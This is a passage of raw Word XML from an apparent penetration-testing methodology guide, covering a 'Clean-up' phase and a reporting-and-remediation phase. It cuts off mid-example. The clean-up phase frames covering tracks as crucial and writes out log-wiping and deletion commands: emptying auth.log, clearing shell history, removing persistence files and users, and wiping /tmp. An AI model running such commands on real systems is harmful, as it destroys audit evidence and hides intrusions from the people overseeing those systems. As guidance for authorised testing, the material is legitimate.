              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="512F5B55" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="02AD65F8" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="5C233256" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>5. Clean-up</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4D4F049A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Leaving </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>no trace is crucial. Here, you cover your tracks, and more importantly, restore the system’s integrity without affecting operational functions.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6B706F58" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Approach</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="536C7648" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Log Clearing</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: You ensure no log traces are left behind by targeting all relevant system logs: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bash echo &gt; /var/log/auth.log &amp;&amp; history -c &amp;&amp; rm -rf ~/.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bash_history</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="030296FB" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Removing Shells</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: If you created any backdoors or persistent shells, removing them is essential. This may involve deleting </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> jobs or clearing tampered binaries: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>bash rm -rf /etc/cron.d/persistent_script.sh</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1566C11A" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>User Audit</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Remove any created user accounts: </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">bash </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>userdel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> -r </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>malicious_user</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="220AB27B" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>System Integrity</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Confirm that any system configurations altered during the test have been restored.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0F6DCD5D" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Executed Commands</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: - </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>history -c &amp;&amp; rm -rf /</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>tmp</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/*</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Clear history and temporary files on Linux) - </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>del &lt;</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>backdoor_files</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>&gt;</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Remove all files uploaded during exploitation) - </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>shutdown -r now</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (Reboot to clear active sessions and close shells)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="026C1080" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="06C1BC52" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="516243A6" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="41CA0811" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7EA45DBF" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="003D0BA5" w14:paraId="0B350DF0" w14:textId="77777777" w:rsidTr="00211D1D">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="262626" w:themeFill="text1" w:themeFillTint="D9"/>
          </w:tcPr>
          <w:p w14:paraId="512D9F0E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>6. Reporting &amp; Remediation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5E3BAC43" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00211D1D">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Finally, a senior </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>pentester</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> excels at comprehensive reporting. The real skill lies in communicating complex technical issues in a way that’s clear to all stakeholders — both technical and executive-level readers.  </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Approach</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="324C5E75" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Documentation</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Capture every significant finding, from reconnaissance to post-exploitation. Include the tools and commands used, but also present the logic behind each attack, how it was executed, and the potential risks if left unmitigated.  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="36D0795C" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Technical Section</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76CC8381" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vulnerability Description</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Detail each vulnerability, including </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>classification</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (e.g., SQL Injection, XSS), and </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>severity</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> based on industry standards like </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CVSS (Common Vulnerability Scoring System)</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. For example: “SQL Injection on </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>login.php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> allows an attacker to extract sensitive database information. CVSS Score: 9.0 (Critical).” Include a screenshot of the successful </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>SQLmap</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> dump, or a similar visual PoC. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1EDDD7D6" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Proof of Exploitation</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Provide technical </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PoCs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, including </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>screenshots of compromised systems</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>captured data</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (with sensitive info redacted), and </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>code snippets</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">. For example, if a command injection was successful, include the full payload used and a screenshot showing root access gained on the target server. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3FADFCD7" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Attack Chain Visualization</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: As an experienced tester, you know that showing how multiple vulnerabilities can be chained together to create a full attack scenario is crucial. Use </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>attack flow diagrams</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> to map out complex attack chains that start from a low-risk vulnerability and lead to full system compromise. This helps the client understand the severity of seemingly low-risk issues. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="10C9A49E" w14:textId="77777777" w:rsidR="003D0BA5" w:rsidRPr="00D76B47" w:rsidRDefault="003D0BA5" w:rsidP="00BF2874">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:numPr>
                <w:ilvl w:val="1"/>
                <w:numId w:val="30"/>
              </w:numPr>
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Remediation Recommendations</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: Based on your 10 years of experience, provide </w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>detailed remediation steps</w:t>
            </w:r>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> beyond the basics. For example, instead of just recommending “use prepared statements” for SQL Injection, offer practical examples of how the code can be implemented in specific languages like PHP or Python: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>php</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00D76B47">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
